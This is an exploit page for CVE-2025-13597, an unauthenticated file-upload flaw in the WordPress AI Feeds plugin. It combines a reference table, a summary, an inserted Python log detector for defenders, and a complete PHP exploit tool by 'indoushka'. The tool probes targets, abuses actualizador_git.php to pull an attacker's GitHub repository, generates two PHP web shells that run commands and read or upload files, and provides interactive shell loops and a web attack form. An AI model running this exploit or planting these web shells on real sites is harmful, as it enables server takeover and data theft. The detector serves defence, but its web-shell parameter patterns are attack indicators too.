| Title | Published | Views | Family |
|---|---|---|---|
| Exploit for CVE-2025-13597 | 25 Nov 2025 17:43 | – | githubexploit |
| CVE-2025-13597 | 25 Nov 2025 21:00 | – | circl |
| WordPress plugin AI Feeds code issue vulnerability | 25 Nov 2025 00:00 | – | cnnvd |
| WordPress AI Feeds plugin arbitrary file upload vulnerability | 27 Nov 2025 00:00 | – | cnvd |
| CVE-2025-13597 | 25 Nov 2025 22:28 | – | cve |
| CVE-2025-13597 AI Feeds <= 1.0.11 - Unauthenticated Arbitrary File Upload | 25 Nov 2025 22:28 | – | cvelist |
| EUVD-2025-199660 | 26 Nov 2025 00:30 | – | euvd |
| CVE-2025-13597 | 25 Nov 2025 23:15 | – | nvd |
| AI Plugins 1.10.9 Shell Upload | 3 Dec 2025 00:00 | – | packetstorm |
| WordPress AI Feeds plugin <= 1.0.11 - Unauthenticated Arbitrary File Upload vulnerability | 26 Nov 2025 06:48 | – | patchstack |
=============================================================================================================================================
| # Title : AI Feeds 1.0.11 Unauthenticated RCE Exploit |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits) |
| # Vendor : https://ai.cibeles.net/ |
=============================================================================================================================================
POC :
[+] References : https://packetstorm.news/files/id/212113/ & CVE-2025-13597
[+] Summary :
CVE-2025-13597 is an unauthenticated arbitrary file upload vulnerability in the AI Feeds plugin for WordPress, versions 1.0.11 and earlier.
It allows unauthenticated attackers to upload arbitrary files, including PHP web shells, through the plugin's GitHub integration, leading to remote code execution and complete compromise of the server.
The flaw lies in the actualizador_git.php file, which lets anyone, without authentication, download and execute files from arbitrary GitHub repositories without proper security controls.
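From a defender's side, the chain described above leaves a recognisable trace in the web server's access log: an unauthenticated request to `actualizador_git.php` that names an attacker-chosen `owner` and `repo`, followed by requests to a PHP file under the plugin directory carrying a command-style parameter. The following detector is an added example written for this page, not code from the advisory or its author; it assumes Apache/nginx combined-format logs, and the sample log lines, IP addresses and repository names in it are constructed for the demonstration.

```python
"""Flag CVE-2025-13597 exploitation patterns in web-server access logs.

Added example (not part of the original advisory). Assumes Apache/nginx
"combined" log format; the sample lines at the bottom are constructed.
"""
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

PLUGIN_DIR = "/wp-content/plugins/ai-feeds/"
UPDATER = PLUGIN_DIR + "actualizador_git.php"
# Parameter names the published PoC's web shells read their commands from.
SHELL_PARAMS = {"cmd", "action"}

# Combined log format; everything after the status code is ignored.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)


def parse_line(line):
    """Parse one access-log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    url = urlsplit(m.group("target"))
    return {
        "ip": m.group("ip"),
        "ts": m.group("ts"),
        "method": m.group("method"),
        "path": url.path,
        "query": {k: v[0] for k, v in parse_qs(url.query).items()},
        "status": int(m.group("status")),
    }


def classify(entry):
    """Label one parsed request, or return None when it is not of interest."""
    path, query = entry["path"], entry["query"]
    # endswith/in rather than == so a site installed in a sub-directory still matches.
    if path.endswith(UPDATER):
        # owner+repo means the caller picked which repository gets pulled;
        # a bare hit is the reachability check the PoC performs first.
        return "updater-abuse" if {"owner", "repo"} <= query.keys() else "updater-probe"
    if PLUGIN_DIR in path and path.endswith(".php") and SHELL_PARAMS & query.keys():
        # A PHP file under the plugin directory driven by a command-style parameter.
        return "webshell-use"
    return None


def scan(lines):
    """Return one finding per suspicious line (ip, ts, label, path, status)."""
    findings = []
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue
        label = classify(entry)
        if label is not None:
            findings.append({"ip": entry["ip"], "ts": entry["ts"], "label": label,
                             "path": entry["path"], "status": entry["status"]})
    return findings


def attack_chains(findings):
    """Map source IP -> ordered labels for sources that went from updater abuse to shell use."""
    by_ip = defaultdict(list)
    for f in findings:
        by_ip[f["ip"]].append(f["label"])
    chains = {}
    for ip, labels in by_ip.items():
        if "updater-abuse" in labels:
            first_abuse = labels.index("updater-abuse")
            if "webshell-use" in labels[first_abuse + 1:]:
                chains[ip] = labels
    return chains


# Constructed sample log: one full exploitation chain plus two benign requests.
SAMPLE_LOG = [
    '203.0.113.10 - - [25/Nov/2025:17:50:01 +0000] "GET /wp-content/plugins/ai-feeds/actualizador_git.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.10 - - [25/Nov/2025:17:50:03 +0000] "GET /wp-content/plugins/ai-feeds/actualizador_git.php?owner=someone&repo=somerepo&ref=main&token=ghp_EXAMPLE HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
    '203.0.113.10 - - [25/Nov/2025:17:50:05 +0000] "GET /wp-content/plugins/ai-feeds/shell.php?cmd=id HTTP/1.1" 200 64 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [25/Nov/2025:18:02:11 +0000] "GET /wp-admin/admin-ajax.php?action=heartbeat HTTP/1.1" 200 100 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [25/Nov/2025:18:02:30 +0000] "GET /wp-content/plugins/ai-feeds/style.css HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    found = scan(SAMPLE_LOG)
    for f in found:
        print(f"{f['ts']} {f['ip']} {f['label']:14} {f['path']} -> {f['status']}")
    for ip, labels in attack_chains(found).items():
        print(f"[!] {ip}: {' -> '.join(labels)}")
```

The `action` parameter is deliberately only treated as suspicious under the plugin directory, since WordPress core uses `action=` legitimately on `admin-ajax.php`; the `updater-probe` label is low-severity on its own but becomes meaningful when the same source proceeds to `updater-abuse`. Run it against the real log with `scan(open("access.log"))`.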
[+] POC :
# Execute a single command
`php poc.php -t https://target.com -o myuser -r myrepo -k ghp_xxx -c 'id'`
# Interactive shell
`php poc.php -t https://target.com -o myuser -r myrepo -k ghp_xxx -i`
# Create a shell for the repo
`php poc.php --create-shell`
```php
#!/usr/bin/env php
<?php
/**
 * AI Feeds <= 1.0.11 - Unauthenticated Arbitrary File Upload RCE Exploit (CVE-2025-13597)
 * Author: indoushka
 * Vendor: https://ai.cibeles.net/
 * Vulnerable Versions: <= 1.0.11
 */
class AIFeedsExploit {
    private $target;

    public function __construct($target_url) {
        $this->target = rtrim($target_url, '/');
    }

    public function check_vulnerability() {
        echo "[*] Checking if target is vulnerable...\n";
        // Check if AI Feeds plugin exists
        $plugin_path = $this->target . '/wp-content/plugins/ai-feeds/';
        $context = stream_context_create([
            'http' => [
                'method' => 'GET',
                'timeout' => 10,
                'user_agent' => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36'
            ]
        ]);
        // Check for plugin directory
        $response = @file_get_contents($plugin_path, false, $context);
        if ($response === false) {
            // Check for actualizador_git.php directly
            $exploit_url = $this->target . '/wp-content/plugins/ai-feeds/actualizador_git.php';
            $response = @file_get_contents($exploit_url, false, $context);
            if ($response !== false) {
                echo "[+] AI Feeds plugin detected - likely vulnerable\n";
                return true;
            }
        } else {
            echo "[+] AI Feeds plugin directory found - likely vulnerable\n";
            return true;
        }
        echo "[-] AI Feeds plugin not found or not accessible\n";
        return false;
    }

    public function exploit($owner, $repo, $token, $command = 'whoami') {
        echo "[*] Exploiting actualizador_git.php vulnerability...\n";
        echo "[*] Target: " . $this->target . "\n";
        echo "[*] GitHub Repository: {$owner}/{$repo}\n";
        $exploit_url = $this->target . '/wp-content/plugins/ai-feeds/actualizador_git.php';
        $params = [
            'owner' => $owner,
            'repo' => $repo,
            'ref' => 'main',
            'token' => $token
        ];
        $query_string = http_build_query($params);
        $full_url = $exploit_url . '?' . $query_string;
        echo "[*] Sending exploit request...\n";
        echo "[*] URL: " . $full_url . "\n";
        $context = stream_context_create([
            'http' => [
                'method' => 'GET',
                'timeout' => 30,
                'user_agent' => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36'
            ]
        ]);
        $response = @file_get_contents($full_url, false, $context);
        if ($response === false) {
            echo "[-] Exploit request failed\n";
            return false;
        }
        echo "[+] Exploit executed. Response:\n";
        echo $response . "\n";
        // Test shell access
        echo "\n[*] Testing shell access...\n";
        $this->test_shell($command);
        return true;
    }

    private function test_shell($command) {
        $shell_url = $this->target . '/wp-content/plugins/ai-feeds/shell.php';
        $test_url = $shell_url . '?cmd=' . urlencode($command);
        echo "[*] Testing command: {$command}\n";
        echo "[*] Shell URL: {$shell_url}?cmd=COMMAND\n";
        $context = stream_context_create([
            'http' => [
                'method' => 'GET',
                'timeout' => 10,
                'user_agent' => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36'
            ]
        ]);
        $response = @file_get_contents($test_url, false, $context);
        if ($response === false) {
            echo "[-] Shell not accessible or command failed\n";
        } else {
            echo "[+] Command output:\n";
            echo $response . "\n";
        }
    }

    public function create_malicious_repo() {
        echo "[*] Creating malicious shell.php for GitHub repository...\n";
        $shell_content = '<?php
// AI Feeds Exploit Web Shell
error_reporting(0);
if(isset($_GET[\'cmd\'])) {
    system($_GET[\'cmd\']);
    echo "\n";
}
if(isset($_POST[\'cmd\'])) {
    system($_POST[\'cmd\']);
    echo "\n";
}
if(isset($_POST[\'upload\'])) {
    move_uploaded_file($_FILES[\'file\'][\'tmp_name\'], $_FILES[\'file\'][\'name\']);
    echo "File uploaded: " . $_FILES[\'file\'][\'name\'];
}
?>';
        file_put_contents('shell.php', $shell_content);
        echo "[+] Created shell.php - upload this to your GitHub repository\n";
        echo "[+] Repository structure should be: /shell.php in main branch\n";
        // Also create a more advanced shell
        $advanced_shell = '<?php
// Advanced AI Feeds Web Shell
class AIShell {
    public function execute($cmd) {
        $output = [];
        $return_code = 0;
        exec($cmd . " 2>&1", $output, $return_code);
        return implode("\n", $output);
    }
    public function listFiles($dir = ".") {
        return scandir($dir);
    }
    public function readFile($file) {
        return file_get_contents($file);
    }
}
$ai_shell = new AIShell();
if(isset($_GET[\'action\'])) {
    switch($_GET[\'action\']) {
        case \'exec\':
            echo $ai_shell->execute($_GET[\'cmd\']);
            break;
        case \'ls\':
            $dir = isset($_GET[\'dir\']) ? $_GET[\'dir\'] : \'.\';
            print_r($ai_shell->listFiles($dir));
            break;
        case \'cat\':
            if(isset($_GET[\'file\'])) {
                echo $ai_shell->readFile($_GET[\'file\']);
            }
            break;
        default:
            echo "Available actions: exec, ls, cat";
    }
} else {
    echo "AI Feeds Web Shell - Ready";
}
?>';
        file_put_contents('advanced_shell.php', $advanced_shell);
        echo "[+] Created advanced_shell.php with more features\n";
    }

    public function interactive_shell() {
        $shell_url = $this->target . '/wp-content/plugins/ai-feeds/shell.php';
        echo "[+] Starting interactive shell...\n";
        echo "[+] Shell URL: {$shell_url}\n";
        echo "[+] Type 'exit' to quit\n\n";
        while (true) {
            echo "cmd> ";
            $command = trim(fgets(STDIN));
            if ($command === 'exit') {
                break;
            }
            if (!empty($command)) {
                $test_url = $shell_url . '?cmd=' . urlencode($command);
                $context = stream_context_create([
                    'http' => [
                        'method' => 'GET',
                        'timeout' => 10
                    ]
                ]);
                $response = @file_get_contents($test_url, false, $context);
                if ($response !== false) {
                    echo $response . "\n";
                } else {
                    echo "[-] Command failed or shell not accessible\n";
                }
            }
        }
    }

    public function advanced_shell() {
        $shell_url = $this->target . '/wp-content/plugins/ai-feeds/advanced_shell.php';
        echo "[+] Starting advanced shell...\n";
        echo "[+] Available commands:\n";
        echo "  ?action=exec&cmd=COMMAND  - Execute command\n";
        echo "  ?action=ls&dir=DIRECTORY  - List files\n";
        echo "  ?action=cat&file=FILENAME - Read file\n";
        echo "[+] Type 'exit' to quit\n\n";
        while (true) {
            echo "ai-feeds> ";
            $input = trim(fgets(STDIN));
            if ($input === 'exit') {
                break;
            }
            if (!empty($input)) {
                if (strpos($input, 'ls') === 0) {
                    $parts = explode(' ', $input);
                    $dir = isset($parts[1]) ? $parts[1] : '.';
                    $test_url = $shell_url . '?action=ls&dir=' . urlencode($dir);
                } elseif (strpos($input, 'cat') === 0) {
                    $parts = explode(' ', $input);
                    if (isset($parts[1])) {
                        $test_url = $shell_url . '?action=cat&file=' . urlencode($parts[1]);
                    } else {
                        echo "Usage: cat filename\n";
                        continue;
                    }
                } else {
                    $test_url = $shell_url . '?action=exec&cmd=' . urlencode($input);
                }
                $context = stream_context_create([
                    'http' => [
                        'method' => 'GET',
                        'timeout' => 10
                    ]
                ]);
                $response = @file_get_contents($test_url, false, $context);
                if ($response !== false) {
                    echo $response . "\n";
                } else {
                    echo "[-] Command failed or advanced shell not accessible\n";
                }
            }
        }
    }
}

// Command line interface
if (php_sapi_name() === 'cli') {
    echo "
██╗███╗ ██╗██████╗ ██████╗ ██╗ ██╗███████╗██╗ ██╗██╗ ██╗ █████╗
██║████╗ ██║██╔══██╗██╔═══██╗██║ ██║██╔════╝██║ ██║██║ ██╔╝██╔══██╗
██║██╔██╗ ██║██ █╔╝██║ ██║██║ ██║███████╗███████║█████╔╝ ███████║
██║██║╚██╗██║██╔══██╗██║ ██║██║ ██║╚════██║██╔══██║██╔═██╗ ██╔══██║
██║██║ ╚████║██████╔╝╚██████╔╝╚██████╔╝███████║██║ ██║██║ ██╗██║ ██║
╚═╝╚═╝ ╚═══╝╚═════╝ ╚═════╝ ╚═════╝ ╚══════╝╚═╝ ╚═╝╚═╝ ╚═╝╚═╝ ╚═╝
AI Feeds <= 1.0.11 Unauthenticated RCE Exploit (CVE-2025-13597)
By: indoushka
\n";
    $options = getopt("t:o:r:k:c:iah", [
        "target:",
        "owner:",
        "repo:",
        "token:",
        "command:",
        "interactive",
        "advanced",
        "help",
        "create-shell"
    ]);
    if (isset($options['h']) || isset($options['help']) || $argc == 1) {
        echo "Usage: php ai_feeds_exploit.php [options]\n";
        echo "Options:\n";
        echo "  -t, --target       Target URL (required)\n";
        echo "  -o, --owner        GitHub repository owner (required)\n";
        echo "  -r, --repo         GitHub repository name (required)\n";
        echo "  -k, --token        GitHub Personal Access Token (required)\n";
        echo "  -c, --command      Command to execute (default: whoami)\n";
        echo "  -i, --interactive  Start interactive shell\n";
        echo "  -a, --advanced     Use advanced shell features\n";
        echo "  --create-shell     Create malicious shell.php for GitHub repo\n";
        echo "  -h, --help         Show this help message\n";
        echo "\nExamples:\n";
        echo "  php ai_feeds_exploit.php -t https://target.com -o myuser -r myrepo -k ghp_xxx -c 'id'\n";
        echo "  php ai_feeds_exploit.php -t https://target.com -o myuser -r myrepo -k ghp_xxx -i\n";
        echo "  php ai_feeds_exploit.php -t https://target.com -o myuser -r myrepo -k ghp_xxx -a\n";
        echo "  php ai_feeds_exploit.php --create-shell\n";
        exit(1);
    }
    if (isset($options['create-shell'])) {
        $exploit = new AIFeedsExploit('');
        $exploit->create_malicious_repo();
        exit(0);
    }
    if (!isset($options['t']) && !isset($options['target'])) {
        echo "Error: Target URL is required\n";
        exit(1);
    }
    if (!isset($options['o']) && !isset($options['owner'])) {
        echo "Error: GitHub owner is required\n";
        exit(1);
    }
    if (!isset($options['r']) && !isset($options['repo'])) {
        echo "Error: GitHub repository is required\n";
        exit(1);
    }
    if (!isset($options['k']) && !isset($options['token'])) {
        echo "Error: GitHub token is required\n";
        exit(1);
    }
    $target = isset($options['t']) ? $options['t'] : $options['target'];
    $owner = isset($options['o']) ? $options['o'] : $options['owner'];
    $repo = isset($options['r']) ? $options['r'] : $options['repo'];
    $token = isset($options['k']) ? $options['k'] : $options['token'];
    $command = isset($options['c']) ? $options['c'] : (isset($options['command']) ? $options['command'] : 'whoami');
    $exploit = new AIFeedsExploit($target);
    // Check vulnerability first
    if (!$exploit->check_vulnerability()) {
        echo "[-] Target does not appear to be vulnerable\n";
        exit(1);
    }
    if (isset($options['a']) || isset($options['advanced'])) {
        // Use advanced shell
        $exploit->exploit($owner, $repo, $token, 'echo "Advanced shell installed"');
        $exploit->advanced_shell();
    } elseif (isset($options['i']) || isset($options['interactive'])) {
        // Interactive shell
        $exploit->exploit($owner, $repo, $token, 'echo "Shell installed successfully"');
        $exploit->interactive_shell();
    } else {
        // Single command execution
        $exploit->exploit($owner, $repo, $token, $command);
    }
} else {
    // Web interface
    if (isset($_POST['exploit'])) {
        $target = $_POST['target'] ?? '';
        $owner = $_POST['owner'] ?? '';
        $repo = $_POST['repo'] ?? '';
        $token = $_POST['token'] ?? '';
        $command = $_POST['command'] ?? 'whoami';
        if ($target && $owner && $repo && $token) {
            $exploit = new AIFeedsExploit($target);
            ob_start();
            $exploit->check_vulnerability();
            $exploit->exploit($owner, $repo, $token, $command);
            $output = ob_get_clean();
            echo "<pre>$output</pre>";
        } else {
            echo "<div style='color: red;'>All fields are required</div>";
        }
    } else {
        echo '<!DOCTYPE html>
<html>
<head>
    <title>AI Feeds RCE Exploit</title>
    <style>
        body { font-family: Arial, sans-serif; margin: 40px; }
        .container { max-width: 600px; margin: 0 auto; }
        .form-group { margin-bottom: 15px; }
        label { display: block; margin-bottom: 5px; font-weight: bold; }
        input[type="text"], input[type="password"] {
            width: 100%; padding: 8px; border: 1px solid #ddd; border-radius: 4px;
        }
        button {
            background: #007cba; color: white; padding: 10px 20px;
            border: none; border-radius: 4px; cursor: pointer;
        }
        .help { font-size: 12px; color: #666; margin-top: 5px; }
    </style>
</head>
<body>
    <div class="container">
        <h1>AI Feeds RCE Exploit (CVE-2025-13597)</h1>
        <form method="post">
            <input type="hidden" name="exploit" value="1">
            <div class="form-group">
                <label for="target">Target URL:</label>
                <input type="text" id="target" name="target" placeholder="https://example.com" required>
                <div class="help">Full URL of the WordPress site</div>
            </div>
            <div class="form-group">
                <label for="owner">GitHub Owner:</label>
                <input type="text" id="owner" name="owner" placeholder="yourusername" required>
                <div class="help">GitHub username or organization name</div>
            </div>
            <div class="form-group">
                <label for="repo">GitHub Repository:</label>
                <input type="text" id="repo" name="repo" placeholder="malicious-repo" required>
                <div class="help">Repository containing shell.php</div>
            </div>
            <div class="form-group">
                <label for="token">GitHub Token:</label>
                <input type="password" id="token" name="token" placeholder="ghp_xxx" required>
                <div class="help">GitHub Personal Access Token with repo access</div>
            </div>
            <div class="form-group">
                <label for="command">Command:</label>
                <input type="text" id="command" name="command" value="whoami">
                <div class="help">Command to execute on target</div>
            </div>
            <button type="submit">Execute Exploit</button>
        </form>
        <div style="margin-top: 30px; padding: 15px; background: #f5f5f5; border-radius: 4px;">
            <h3>Setup Instructions:</h3>
            <ol>
                <li>Create a GitHub repository with a shell.php file</li>
                <li>Generate a GitHub Personal Access Token with repo permissions</li>
                <li>Fill in the form above and execute</li>
                <li>Access shell at: /wp-content/plugins/ai-feeds/shell.php?cmd=COMMAND</li>
            </ol>
        </div>
    </div>
</body>
</html>';
    }
}
?>
```
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================